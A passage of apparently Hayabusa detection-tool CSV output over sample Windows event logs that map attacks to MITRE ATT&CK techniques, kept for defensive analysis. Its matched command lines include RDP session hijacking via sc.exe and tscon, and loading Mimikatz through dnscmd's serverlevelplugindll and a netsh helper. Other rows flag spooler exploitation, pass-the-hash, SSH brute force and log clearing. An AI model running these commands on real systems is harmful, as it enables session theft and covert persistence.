C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: 
C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 
0x1498 | User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:52.315 
+09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 
| Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: 
C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | 
Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
